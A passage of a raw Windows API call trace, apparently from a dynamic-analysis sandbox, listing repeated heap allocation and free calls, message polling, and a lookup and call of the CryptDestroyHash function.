dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.227] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0039.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0039.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0039.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0039.227] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0039.227] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0039.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.228] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0039.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.228] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0039.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0039.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891d8 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce98 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc88 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ceb0 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889550 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdd8 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca30 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c790 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbb0 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0039.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a90 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889730 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c940 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.229] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cee0 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.229] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0039.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0039.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0039.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.230] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0039.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae9a8 [0039.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x7ae9a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0039.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0039.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0039.231] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0039.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0039.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0039.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0039.231] CryptDestroyHash (hHash=0x7c2100) returned 1 [0039.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0039.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0039.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0039.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0039.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 